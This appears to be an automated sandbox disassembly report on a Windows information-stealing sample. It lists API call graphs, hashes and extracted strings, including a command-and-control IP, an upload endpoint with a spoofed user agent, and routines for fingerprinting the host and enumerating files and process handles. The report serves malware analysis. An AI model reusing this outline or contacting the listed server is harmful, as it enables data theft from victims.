2 API calls 2796->2797 2796->2798 2797->2798 2798->2754 2799->2757 2801 2c2360 RtlAllocateHeap RtlFreeHeap 2800->2801 2803 2c8f4c 2801->2803 2802 2c90a2 2802->2769 2803->2802 2804 2c9098 CloseHandle 2803->2804 2805 2c1ea0 RtlAllocateHeap 2803->2805 2804->2802 2806 2c902d 2805->2806 2806->2804 2807 2c9082 2806->2807 2808 2c1ee0 RtlFreeHeap 2806->2808 2807->2804 2808->2807 2809->2775 2811 2c7d23 2810->2811 2813 2c7d29 2810->2813 2812 2c89f0 RtlAllocateHeap 2811->2812 2811->2813 2812->2813 2813->2781 2815 2c8a50 RtlFreeHeap 2814->2815 2816 2c80dc 2815->2816 2816->2777 2817->2798 2818->2789 2819->2796 2824 2c2a6f 2820->2824 2821 2c2b01 2825 2c1ea0 RtlAllocateHeap 2821->2825 2822 2c2af4 Sleep 2822->2824 2824->2821 2824->2822 2826 2c1ea0 RtlAllocateHeap 2824->2826 2825->2703 2826->2824 2828 2c3a3c 2827->2828 2829 2c8b90 GetCurrentHwProfileA 2828->2829 2830 2c3a50 2829->2830 2839 2c3b80 2830->2839 2834 2c3b60 2835 2c1ee0 RtlFreeHeap 2834->2835 2836 2c3b6c 2835->2836 2836->2676 2837 2c3ada 2837->2834 2838 2c2b10 3 API calls 2837->2838 2838->2834 2854 2c1ec0 RtlSizeHeap 2839->2854 2841 2c3b8f 2855 2c1ea0 RtlAllocateHeap 2841->2855 2843 2c3ba7 2844 2c7d10 RtlAllocateHeap 2843->2844 2847 2c3bb4 2844->2847 2845 2c3be2 2846 2c3c1c 2845->2846 2848 2c3bf0 2845->2848 2849 2c1ee0 RtlFreeHeap 2846->2849 2847->2845 2850 2c80d0 RtlFreeHeap 2847->2850 2851 2c1ee0 RtlFreeHeap 2848->2851 2852 2c3ac8 2849->2852 2850->2845 2851->2852 2853 2c1ea0 RtlAllocateHeap 2852->2853 2853->2837 2854->2841 2855->2843 2867 2c1ea0 RtlAllocateHeap 2856->2867 2858 2c33c2 2860 2c33dd 2858->2860 2861 2c33cd LocalAlloc 2858->2861 2859 2c33b3 LocalFree 2859->2860 2860->2681 2861->2860 2862 2c32b3 2863 2c8b90 GetCurrentHwProfileA 2862->2863 2866 2c33a7 2862->2866 2864 2c32ea 2863->2864 2865 2c2b10 3 API calls 2864->2865 2865->2866 2866->2858 2866->2859 2867->2862 2908 2c1ea0 RtlAllocateHeap 2868->2908 2870 2c149b NtQuerySystemInformation 2871 2c148e 2870->2871 2877 2c14d3 2870->2877 2871->2870 2872 2c2060 2 API calls 2871->2872 2872->2871 2873 2c15fa 2876 2c1ee0 RtlFreeHeap 2873->2876 2874 2c15f5 2874->2541 2875 2c1512 OpenProcess 2875->2877 2878 2c1603 2876->2878 2877->2873 2877->2874 2877->2875 2879 2c153a GetCurrentProcess DuplicateHandle 2877->2879 2878->2541 2880 2c156f 2879->2880 2881 2c15eb FindCloseChangeNotification 2879->2881 2880->2881 2882 2c157b GetFileType 2880->2882 2881->2874 2882->2881 2883 2c158a 2882->2883 2909 2c1610 2883->2909 2885 2c1593 2885->2881 2886 2c159a CloseHandle GetCurrentProcess DuplicateHandle 2885->2886 2886->2881 2887 2c15d2 2886->2887 2887->2881 2888 2c15d8 CloseHandle 2887->2888 2888->2881 2889->2543 2891 2c31c5 2890->2891 2913 2c8d00 GetUserDefaultUILanguage 2891->2913 2893 2c3233 2914 2c8c00 EnumDisplayDevicesA 2893->2914 2895 2c324b 2896 2c8b90 GetCurrentHwProfileA 2895->2896 2897 2c3259 2896->2897 2916 2c8cc0 GetPhysicallyInstalledSystemMemory 2897->2916 2899 2c3265 2918 2c8ca0 GetSystemInfo 2899->2918 2901 2c3271 2919 2c8c50 GetKeyboardLayoutList 2901->2919 2903 2c327d 2920 2c8c70 KiUserCallbackDispatcher GetSystemMetrics 2903->2920 2905 2c3289 2921 2c8d20 GetModuleFileNameW 2905->2921 2907 2c3295 2907->2547 2908->2871 2910 2c161d 2909->2910 2911 2c1656 NtQueryObject NtQueryObject 2910->2911 2912 2c1693 2911->2912 2912->2885 2913->2893 2915 2c8c2a 2914->2915 2915->2895 2917 2c8cd4 __aulldiv 2916->2917 2917->2899 2918->2901 2919->2903 2920->2905 2921->2907 2922->2552 2924 2c29ec 2923->2924 2925 2c2a25 2924->2925 2926 2c2a17 TerminateThread 2924->2926 2927 2c2a3d 2925->2927 2928 2c2a2e TerminateThread 2925->2928 2926->2925 2927->2559 2928->2927 2930 2c43e0 3 API calls 2929->2930 2931 2c1c94 2930->2931 2932 2c1e80 HeapDestroy 2931->2932 2932->2563 2933 2c25e3 2935 2c25eb 2933->2935 2934 2c260d 2935->2934 2936 2c2629 2935->2936 2937 2c26ba 2935->2937 2956 2c1ea0 RtlAllocateHeap 2936->2956 2939 2c26cc 2937->2939 2940 2c275d 2937->2940 2957 2c1ea0 RtlAllocateHeap 2939->2957 2953 2c2692 2940->2953 2958 2c1ea0 RtlAllocateHeap 2940->2958 2943 2c26eb 2947 2c12f0 12 API calls 2943->2947 2944 2c278e 2951 2c1000 7 API calls 2944->2951 2945 2c2648 2946 2c1060 12 API calls 2945->2946 2948 2c2686 2946->2948 2949 2c2729 2947->2949 2950 2c1ee0 RtlFreeHeap 2948->2950 2952 2c1ee0 RtlFreeHeap 2949->2952 2950->2953 2954 2c27cc 2951->2954 2952->2953 2955 2c1ee0 RtlFreeHeap 2954->2955 2955->2953 2956->2945 2957->2943 2958->2944

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 002C1EA0: RtlAllocateHeap.NTDLL(030F0000,00000008,002C3D82), ref: 002C1EB0
                                                  • NtQuerySystemInformation.NTDLL(00000010,?,00001000,00000000), ref: 002C14A9
                                                  • OpenProcess.KERNEL32(00000040,00000000,?), ref: 002C1523
                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 002C154B
                                                  • DuplicateHandle.KERNELBASE(000000FF,?,00000000), ref: 002C1565
                                                  • GetFileType.KERNELBASE(000000FF), ref: 002C157F
                                                  • CloseHandle.KERNEL32(000000FF), ref: 002C159E
                                                  • GetCurrentProcess.KERNEL32(000000FF,00000000,00000000,00000001), ref: 002C15AE
                                                  • DuplicateHandle.KERNEL32(000000FF,?,00000000), ref: 002C15C8
                                                  • CloseHandle.KERNEL32(000000FF), ref: 002C15DC
                                                  • FindCloseChangeNotification.KERNELBASE(000000FF), ref: 002C15EF
                                                    • Part of subcall function 002C1EE0: RtlFreeHeap.NTDLL(030F0000,00000000,00000000,02E80000), ref: 002C1EFE
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.2744616304.00000000002C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002C0000, based on PE: true
                                                  • Associated: 00000017.00000002.2744522121.00000000002C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744745377.00000000002CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744780989.00000000002CB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744872211.00000000002CC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_23_2_2c0000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: Handle$CloseProcess$CurrentDuplicateHeap$AllocateChangeFileFindFreeInformationNotificationOpenQuerySystemType
                                                  • String ID:
                                                  • API String ID: 2769610337-0
                                                  • Opcode ID: ed180b1ff0556b8e54712d096241b252c63e9645cacef9540c195ee1c49333be
                                                  • Instruction ID: c9751bf11fe766c7acf640a8510233b4abf809b20d5c80f890c746b736e1c6d8
                                                  • Opcode Fuzzy Hash: ed180b1ff0556b8e54712d096241b252c63e9645cacef9540c195ee1c49333be
                                                  • Instruction Fuzzy Hash: 17515FB4D10209EFDB24CFD8D889FAEB7B5BF49345F10425CE612A7281C7749A61CB61

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 75 2c8d40-2c8d5d call 2c1ea0 78 2c8ed5-2c8ed8 75->78 79 2c8d63-2c8da6 call 2c2360 FindFirstFileW call 2c2250 75->79 84 2c8dac-2c8dd1 call 2c2250 * 2 79->84 85 2c8ec9-2c8ed2 call 2c1ee0 79->85 92 2c8de8-2c8dec 84->92 93 2c8dd3-2c8de6 84->93 85->78 95 2c8e1d-2c8e47 call 2c2360 92->95 96 2c8dee-2c8e01 92->96 93->92 94 2c8e18 93->94 98 2c8ea6-2c8eb9 FindNextFileW 94->98 109 2c8e48 call 2c1110 95->109 110 2c8e48 call 2c1380 95->110 96->95 97 2c8e03-2c8e16 96->97 97->94 97->95 98->84 100 2c8ebf-2c8ec3 FindClose 98->100 100->85 102 2c8e4b-2c8e54 103 2c8e9a-2c8ea2 102->103 104 2c8e56-2c8e5c 102->104 103->98 104->103 105 2c8e5e-2c8e68 104->105 105->103 106 2c8e6a-2c8e89 call 2c8d40 105->106 108 2c8e8e-2c8e97 106->108 108->103 109->102 110->102
                                                  APIs
                                                    • Part of subcall function 002C1EA0: RtlAllocateHeap.NTDLL(030F0000,00000008,002C3D82), ref: 002C1EB0
                                                  • FindFirstFileW.KERNELBASE(00000000,?), ref: 002C8D83
                                                  • FindNextFileW.KERNELBASE(000000FF,?), ref: 002C8EB1
                                                  • FindClose.KERNEL32(000000FF), ref: 002C8EC3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.2744616304.00000000002C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002C0000, based on PE: true
                                                  • Associated: 00000017.00000002.2744522121.00000000002C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744745377.00000000002CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744780989.00000000002CB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744872211.00000000002CC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_23_2_2c0000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: Find$File$AllocateCloseFirstHeapNext
                                                  • String ID: %s\%s$%s\*
                                                  • API String ID: 2963102669-2848263008
                                                  • Opcode ID: 11225f78700ce2bb91e34cc1a8641d713e139db15a6b291b32430e52ac0e5f26
                                                  • Instruction ID: e9eb8b000212b60252212f05ff8ae27cbdc1dde6beda3f556a97388ad44aee50
                                                  • Opcode Fuzzy Hash: 11225f78700ce2bb91e34cc1a8641d713e139db15a6b291b32430e52ac0e5f26
                                                  • Instruction Fuzzy Hash: 7341F0B5D00259EBCB14DFA4DD59EEF77B9AF48300F1086ACF90597282EA349B20CB51

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 111 2c17e0-2c1843 112 2c184e-2c1857 111->112 113 2c1845-2c184b 111->113 114 2c185d-2c188a call 2c2130 call 2c90f0 112->114 115 2c18e2-2c18e6 112->115 113->112 127 2c188c-2c1895 114->127 128 2c1899-2c18a0 114->128 116 2c18ef-2c1916 115->116 117 2c18e8-2c18ea 115->117 120 2c191c-2c1925 116->120 121 2c1a16 116->121 122 2c1a19-2c1a1c 117->122 120->121 124 2c192b-2c1931 120->124 121->122 126 2c1938-2c1944 124->126 129 2c1946-2c195e 126->129 130 2c1960-2c19c9 126->130 127->115 133 2c18cb-2c18dd 128->133 134 2c18a2-2c18c8 GlobalHandle 128->134 129->126 131 2c19cb-2c19dc 130->131 132 2c19f7-2c1a12 LoadLibraryA GetProcAddress 130->132 135 2c19de-2c19ef 131->135 136 2c19f1-2c19f4 131->136 132->122 133->113 134->133 135->131 136->132
                                                  APIs
                                                  • GlobalHandle.KERNEL32(00000000), ref: 002C18C8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.2744616304.00000000002C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002C0000, based on PE: true
                                                  • Associated: 00000017.00000002.2744522121.00000000002C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744745377.00000000002CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744780989.00000000002CB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744872211.00000000002CC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_23_2_2c0000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: GlobalHandle
                                                  • String ID: l
                                                  • API String ID: 1075865800-2517025534
                                                  • Opcode ID: 52e9c71b1fa2cd143679c5b526a2421662126662f1811ae3ceab4e50f04fbb10
                                                  • Instruction ID: cc68cf033135bbda90f6d6e4d05995856aa8335abcf9b9984274095ae9c69edc
                                                  • Opcode Fuzzy Hash: 52e9c71b1fa2cd143679c5b526a2421662126662f1811ae3ceab4e50f04fbb10
                                                  • Instruction Fuzzy Hash: 7D91C574E14209DFCF08CF98D591AADBBB2FF49308F248299D915AB341D730AA61DF94

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 217 2c8ca0-2c8cbf GetSystemInfo
                                                  APIs
                                                  • GetSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,002C3271,G1,), ref: 002C8CAA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.2744616304.00000000002C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002C0000, based on PE: true
                                                  • Associated: 00000017.00000002.2744522121.00000000002C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744745377.00000000002CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744780989.00000000002CB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744872211.00000000002CC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_23_2_2c0000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: InfoSystem
                                                  • String ID: q2,
                                                  • API String ID: 31276548-1977279463
                                                  • Opcode ID: 25ad2b0ab2ce64ca51f34b66d374439bdee96eda7ad683cbb3a254ace98418bc
                                                  • Instruction ID: e77791923c1b178b8bde7abc6768b80d21f3ab662a2dc8dc30610239e252bb3b
                                                  • Opcode Fuzzy Hash: 25ad2b0ab2ce64ca51f34b66d374439bdee96eda7ad683cbb3a254ace98418bc
                                                  • Instruction Fuzzy Hash: EDD0A97490520C8BCB00DF90D84889AB7FDAB48204F0081A4DC4C47300EA32A9128BD1
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.2744616304.00000000002C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002C0000, based on PE: true
                                                  • Associated: 00000017.00000002.2744522121.00000000002C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744745377.00000000002CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744780989.00000000002CB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744872211.00000000002CC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_23_2_2c0000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: aff3bf203213e3ffffd20615bcfe2e4d16dffa8ae5426f080bec32a5c75d23b9
                                                  • Instruction ID: 3df805bcf11f3f5737b13c94422149d0af67da5f15029f59ff0ca1c92982ced3
                                                  • Opcode Fuzzy Hash: aff3bf203213e3ffffd20615bcfe2e4d16dffa8ae5426f080bec32a5c75d23b9
                                                  • Instruction Fuzzy Hash: 3F41F130A04245DBDB04CFA4D852FA9BBB6AB85300F2486ACE5054B7DAD776DF22DB50

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 29 2c2810-2c2855 31 2c285c-2c28c1 29->31 32 2c2857 29->32 39 2c28c5-2c28e7 CreateThread 31->39 40 2c28c3 31->40 33 2c291a 32->33 34 2c291c-2c291f 33->34 41 2c28e9 39->41 42 2c28eb-2c290f CreateThread 39->42 40->33 41->33 43 2c2911 42->43 44 2c2913-2c2918 42->44 43->33 44->34
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.2744616304.00000000002C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002C0000, based on PE: true
                                                  • Associated: 00000017.00000002.2744522121.00000000002C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744745377.00000000002CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744780989.00000000002CB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744872211.00000000002CC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_23_2_2c0000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0u$0u0u$0u0u$45.125.66.18$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.4$`
                                                  • API String ID: 0-2265949662
                                                  • Opcode ID: 246dab2c0c077406006ee31f18edc054d999c4aa49dc5c436772e8ad964fcb59
                                                  • Instruction ID: a1ef4831213b2e4fff8f378288b585d1017f0a7749b56c92f562b8b0a9c729e8
                                                  • Opcode Fuzzy Hash: 246dab2c0c077406006ee31f18edc054d999c4aa49dc5c436772e8ad964fcb59
                                                  • Instruction Fuzzy Hash: 73310675650308EFE710CF50DC4AFA9BB65AB08741F20C248FA09AF2D0C7B5AA85CB95

                                                  Control-flow Graph

                                                  APIs
                                                  • CreateMutexA.KERNELBASE(00000000,00000000,082e2202-17f7-4654-a651-ac9a3778e1d7), ref: 002C1D43
                                                  • GetLastError.KERNEL32 ref: 002C1D52
                                                  • Sleep.KERNELBASE(00001388), ref: 002C1E1C
                                                  • CloseHandle.KERNEL32(00000000), ref: 002C1E3A
                                                  • ExitProcess.KERNEL32 ref: 002C1E42
                                                  Strings
                                                  • 082e2202-17f7-4654-a651-ac9a3778e1d7, xrefs: 002C1D3A
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.2744616304.00000000002C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002C0000, based on PE: true
                                                  • Associated: 00000017.00000002.2744522121.00000000002C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744745377.00000000002CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744780989.00000000002CB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744872211.00000000002CC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_23_2_2c0000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateErrorExitHandleLastMutexProcessSleep
                                                  • String ID: 082e2202-17f7-4654-a651-ac9a3778e1d7
                                                  • API String ID: 168847217-1460249064
                                                  • Opcode ID: 0c446571103aac71dd8d0aa3ea9a22ff7e5ac839dbfb8f3f43a5a864172c0adb
                                                  • Instruction ID: b3b481e271f916456f26ad6dbbfc955c16c64c74854772c1c444a13c37d84850
                                                  • Opcode Fuzzy Hash: 0c446571103aac71dd8d0aa3ea9a22ff7e5ac839dbfb8f3f43a5a864172c0adb
                                                  • Instruction Fuzzy Hash: 6831C1B1C102199BDB24DFA4AC4BFED7775AB05344F10426EE905B2182DB709A74DBA2

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 137 2c2e60-2c2e66 138 2c2e6d-2c2e74 137->138 139 2c30af-2c30b2 138->139 140 2c2e7a-2c2e80 138->140 141 2c2e8e-2c2e97 140->141 142 2c2e9d-2c2ea9 141->142 143 2c309f-2c30aa Sleep 141->143 144 2c2eaf-2c2ebe 142->144 145 2c309a 142->145 143->138 146 2c2ed5-2c2ef8 call 2c91d0 144->146 147 2c2ec0-2c2ecf 144->147 145->143 150 2c2efa-2c2f0b call 2c2920 146->150 151 2c2f10-2c2f2c 146->151 147->145 147->146 157 2c2e82-2c2e8a 150->157 153 2c2f32-2c2f6e 151->153 154 2c2fc3-2c2ff0 call 2c1ea0 151->154 160 2c2f87-2c2faa 153->160 161 2c2f70-2c2f82 153->161 164 2c3009-2c3061 154->164 165 2c2ff2-2c2ffd 154->165 157->141 160->154 166 2c2fac-2c2fb7 160->166 161->157 167 2c3068-2c306f 164->167 165->164 166->154 168 2c3088-2c3093 167->168 169 2c3071-2c307c 167->169 168->145 169->168
                                                  APIs
                                                  • Sleep.KERNELBASE(000003E8), ref: 002C30A4
                                                    • Part of subcall function 002C1EA0: RtlAllocateHeap.NTDLL(030F0000,00000008,002C3D82), ref: 002C1EB0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.2744616304.00000000002C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002C0000, based on PE: true
                                                  • Associated: 00000017.00000002.2744522121.00000000002C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744745377.00000000002CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744780989.00000000002CB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744872211.00000000002CC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_23_2_2c0000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: AllocateHeapSleep
                                                  • String ID: /api/receiver/recv$Content-Type: application/octet-stream$POST
                                                  • API String ID: 4201116106-1595302217
                                                  • Opcode ID: a2debb93d20603d0cbf1be862071cce3b593672e4fdae44b9e880211d9e66e5a
                                                  • Instruction ID: b01c3b2c952f7d1a91513ddcbd411ecdb2e27e962a1ef9f9e6d02884b5f3dc2e
                                                  • Opcode Fuzzy Hash: a2debb93d20603d0cbf1be862071cce3b593672e4fdae44b9e880211d9e66e5a
                                                  • Instruction Fuzzy Hash: 477137B8A10219EBCB14CF44D544FB9BBB1BF48314F20869CE9465B381DB75EE91DB90

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 170 2c8cc0-2c8cd2 GetPhysicallyInstalledSystemMemory 171 2c8cd4-2c8ceb call 2c9260 170->171 172 2c8cf2-2c8cf5 170->172 171->172
                                                  APIs
                                                  • GetPhysicallyInstalledSystemMemory.KERNELBASE(e2,,002C3265,G1,,?,?,?,?,?,?,?,?,?,002C3147), ref: 002C8CCA
                                                  • __aulldiv.LIBCMT ref: 002C8CE3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.2744616304.00000000002C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002C0000, based on PE: true
                                                  • Associated: 00000017.00000002.2744522121.00000000002C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744745377.00000000002CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744780989.00000000002CB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744872211.00000000002CC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_23_2_2c0000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: InstalledMemoryPhysicallySystem__aulldiv
                                                  • String ID: e2,
                                                  • API String ID: 3833932492-1861609547
                                                  • Opcode ID: 33a1ce124583944728548c4533c5adcdcc21fc969c2e9bf5501d6220678ed151
                                                  • Instruction ID: 59855e879fdc9b38d5571757cd348e8ab9ff80655a7f88af399870c41688b478
                                                  • Opcode Fuzzy Hash: 33a1ce124583944728548c4533c5adcdcc21fc969c2e9bf5501d6220678ed151
                                                  • Instruction Fuzzy Hash: D2E08C38600208B7CB00DFE0DC4AF9A777CAB48700F0082ADB948A7280EF31AA11C7E5

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 200 2c3ef0-2c3f10 VirtualAlloc 201 2c3f16-2c3f33 VirtualAlloc 200->201 202 2c3f12-2c3f14 200->202 204 2c3f39-2c3f56 VirtualAlloc 201->204 205 2c3f35-2c3f37 201->205 203 2c3f61-2c3f62 202->203 206 2c3f5c 204->206 207 2c3f58-2c3f5a 204->207 205->203 206->203 207->203
                                                  APIs
                                                  • VirtualAlloc.KERNELBASE(00000000,00000015,00003000,00000040,?,002C3D5B,?,002C1D86,?), ref: 002C3EFE
                                                  • VirtualAlloc.KERNELBASE(00000000,00000015,00003000,00000040,?,002C3D5B,?,002C1D86,?), ref: 002C3F21
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.2744616304.00000000002C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002C0000, based on PE: true
                                                  • Associated: 00000017.00000002.2744522121.00000000002C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744745377.00000000002CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744780989.00000000002CB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744872211.00000000002CC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_23_2_2c0000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: d1468792b017f81959ab1531245ecae14faa1fdb472ffacf11f484f473aaf2f7
                                                  • Instruction ID: 2f0e3211629d8106317125bd18f8e707b94b575f45507207d681375e2cb8c279
                                                  • Opcode Fuzzy Hash: d1468792b017f81959ab1531245ecae14faa1fdb472ffacf11f484f473aaf2f7
                                                  • Instruction Fuzzy Hash: 34F03A30AA9304EEEB629B21BC9FF1536B49308B16F104C2CB30EAE5D0F3F492508A15

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 208 2c12f0-2c1305 209 2c1327-2c1353 call 2c8d40 208->209 210 2c1307-2c1321 SHGetFolderPathW 208->210 213 2c1355-2c1361 call 2c3a20 209->213 214 2c1370-2c1373 209->214 210->209 216 2c1366-2c1369 213->216 216->214
                                                  APIs
                                                  • SHGetFolderPathW.SHELL32(00000000,000000FF,00000000,00000000,)',@), ref: 002C1321
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.2744616304.00000000002C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002C0000, based on PE: true
                                                  • Associated: 00000017.00000002.2744522121.00000000002C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744745377.00000000002CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744780989.00000000002CB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000017.00000002.2744872211.00000000002CC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_23_2_2c0000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: FolderPath
                                                  • String ID: )',@
                                                  • API String ID: 1514166925-2391885299
                                                  • Opcode ID: ee8534db309767c52014aa6ed316aff66e8295cccd2f990a7023df8f83ed39fb
                                                  • Instruction ID: 027a9be010f3744f8e2c5a3ef07896446dc79c9c6ae15b1bf13461b1b2c48d24
                                                  • Opcode Fuzzy Hash: ee8534db309767c52014aa6ed316aff66e8295cccd2f990a7023df8f83ed39fb
                                                  • Instruction Fuzzy Hash: EF015EB0610208BBD708CF44CC56FEA7368EB45318F14C3A8FA194B2C2D675AA60CB94

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
